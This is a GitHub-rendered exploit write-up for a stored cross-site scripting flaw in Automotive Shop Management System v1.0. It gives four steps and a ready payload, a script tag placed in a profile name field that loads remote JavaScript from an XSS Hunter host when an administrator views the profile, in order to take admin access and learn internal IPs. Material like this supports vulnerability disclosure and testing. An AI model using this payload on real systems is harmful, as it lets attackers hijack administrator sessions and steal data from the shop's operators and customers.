Skip to content

Latest commit

 

History

History
23 lines (17 loc) · 1.09 KB

exploit_xss_asms.md

File metadata and controls

23 lines (17 loc) · 1.09 KB

Exploit Title: Automotive Shop Management System v1.0 - Stored Cross Site Scripting(XSS)

Exploit Author: NS Kumar (n1_x)

Date: May 6, 2022

Tested on: Parrot Linux, Apache, Mysql

Vendor: oretnom23

Version: v1.0

Exploit Description:

Automotive Shop Management System v1.0 suffers from stored XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.

````````````````````````````````````````To Exploit```````````````````````````````````````````````````` Step 1: Goto Profile Page

Step 2: Put XSS Hunter Payload on Either First Name or Last Name field

Step 3: Wait for Admin to view your details

Step 4: Then you will see xss fires alert on xss hunter page

Payload Used for this Exploit: "><script src=https://d4.xss.ht></script>